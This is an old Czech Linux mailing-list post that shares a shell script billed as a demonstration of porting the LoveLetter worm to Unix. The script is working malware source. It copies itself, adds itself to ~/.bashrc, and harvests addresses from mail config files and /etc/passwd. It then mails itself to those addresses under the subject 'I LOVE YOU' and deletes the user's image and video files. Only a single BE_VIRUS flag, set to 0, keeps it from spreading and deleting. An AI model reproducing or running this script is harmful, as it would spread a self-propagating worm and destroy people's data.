ILY...
Vilem Pulc
pulc4 na students.zcu.cz
Čtvrtek Květen 11 14:20:16 CEST 2000
Pan DD neco napisal na tom svym platku a dokonce se mi to podarilo na
newsech najit (ci spise kamosovi) a tak se kouknete na tenhle skript, aj
moc casu nemam, finisuji diplomku........
Viky
PS: Ne ze to spustite...:-)))))
------------- další část ---------------
#!/bin/sh
# This is a demonstration how easy a virus like the LoveLetter virus
# can be portet to a unix systems.
#
# First this "virus" searches for the users email adresses in
# $MAIL_FILES
# then its extracting the other usernames out of the /etc/passwd file.
# He creates a shell script for sending the virus to the extracted
# adresses. Have a look on $MAIL_PROG.
#
# Then he is executing this script.
#
# The second Part of the virus tries to delete all $DELETE_FILES file.
# Its useses locate to get the file names.
# The virus creates a shell script for removing these files.
# Have a look on $DELETE_PROG. There you can see which files the
# virus would be able to delete.
#
# Then he is executing this script.
#
# If the $BE_VIRUS value is set to 0 (false)
# none of these script will be executed. If its set to 1 (true) both
# scripts will be executed
# 0 is false and 1 is true
# Be careful! If you set it to 1 it becomes
# a real virus and can damage your system
# and infekt many other computers!
BE_VIRUS=0
PROG_DIR=~/loveletter
PROG_BIN_DIR=$PROG_DIR/bin
PROG_FILES_DIR=$PROG_DIR/files
README_FILE=$PROG_DIR/REAMDE
PROG_LOG_FILE=$PROG_DIR/log
BIN_PROG=$PROG_BIN_DIR/loveletter.sh
MAIL_FILES=".muttrc .mailrc"
MAIL_PROG=$PROG_BIN_DIR/sendmails.sh
DELETE_FILES="*.jpg *.mpg *.mpeg *.gif"
DELETE_PROG=$PROG_BIN_DIR/rm.sh
# logging the activties
# eg.: log "Sending Mail to Skinny";
log() {
echo $*
echo $* >> $PROG_LOG_FILE
}
create_directories() {
mkdir $PROG_DIR
mkdir $PROG_BIN_DIR
mkdir $PROG_FILES_DIR
log "Creating directory" $PROG_DIR
log "Creating directory" $PROG_BIN_DIR
log "Creating directory" $PROG_FILES_DIR
}
pos_bin() {
local pos
pos=`pwd`
log "Copying" $pos/$0 $PROG_BIN_DIR/loveletter.sh
cp $pos/$0 $PROG_BIN_DIR/loveletter.sh
chmod 755 $PROG_BIN_DIR/loveletter.sh
}
# cleans the old loveletter directory
clean_old_stuff() {
rm -rf $PROG_DIR
}
# hook into the startup process
hook_into_startup() {
local bashrc
if test $BE_VIRUS -eq 0; then
# we are not a virus, we are doing
# it on a copy
cp ~/.bashrc $PROG_FILES_DIR
bashrc=$PROG_FILES_DIR/.bashrc
else
bashrc=~/.bashrc
fi
if test -f $bashrc; then
log "Adding \"" $BIN_PROG "& \"to " ~/.bashrc
echo $BIN_PROG "&" >> $bashrc
fi
}
# extracting email-addresses out of different
# mail files
get_adresses() {
local f
local a
local adresses
log "Getting email adresses"
for f in $MAIL_FILES; do
if test -f $f; then
a=`perl -e 'open( INFILE, "'$f'" );
foreach( <INFILE> ) {
if( /^alias/i ) {
s/(.*[\"\< ])([\w\-\.]+@[a-zA-Z0-9\.\-_]+)(.*$)/$2/;
print "$_";
}
}
close( INFILE );'`
adresses="$adresses $a"
fi
done
# names of other users on the system
a=`awk 'BEGIN{ FS=":"} { print $1 }' /etc/passwd`
adresses="$adresses $a"
log "Creating sendmail file"
echo "#!/bin/sh" >> $MAIL_PROG
chmod 755 $MAIL_PROG
for a in $adresses; do
echo 'mailx -s "I LOVE YOU" '$a' < '$BIN_PROG >> $MAIL_PROG
done
}
send_virus() {
local n
# number of email adresses
n=`awk 'END{ a=NR-1; print a }' $MAIL_PROG`
log "Sending Virus to " $n "users"
if test $BE_VIRUS -eq 1; then
$MAIL_PROG
fi
}
get_files() {
local f
local files
log "Getting deletable files"
for f in $DELETE_FILES; do
files="$files `locate $f`"
done
echo "#!/bin/sh" >> $DELETE_PROG
chmod 755 $DELETE_PROG
for f in $files; do
if test -O $f; then
echo "rm -f $f" >> $DELETE_PROG
else
if test -G $f; then
echo "rm -f $f" >> $DELETE_PROG
fi
fi
done
}
delete_files() {
local n
n=`awk 'END{ a=NR-1; print a }' $DELETE_PROG`
log "Deleting $n files"
if test $BE_VIRUS -eq 1; then
$DELETE_PROG
fi
}
create_readme() {
log "Creating $README_FILE file"
echo '
This is a demonstration how easy a virus like the LoveLetter virus
can be portet to a unix systems.
First this "virus" searches for the users email adresses in
'$MAIL_FILES'
then its extracting the other usernames out of the /etc/passwd file.
He creates a shell script for sending the virus to the extracted
adresses. Have a look at the '$MAIL_PROG' file.
Then he is executing this script.
The second Part of the virus tries to delete all '$DELETE_FILES' file.
Its useses locate to get the file names.
The virus creates a shell script for removing these files.
Have a look on '$DELETE_PROG'. There you can see which files the
virus would be able to delete.
Then he is executing this script.
The BE_VIRUS value is to '$BE_VIRUS', so if its set to 0 (false)
none of these script will be executed. If its set to 1 (true) both
scripts will be executed
' > $README_FILE
}
# the main program
clean_old_stuff
create_directories
create_readme
pos_bin
hook_into_startup
get_adresses
send_virus
get_files
delete_files
Další informace o konferenci Linux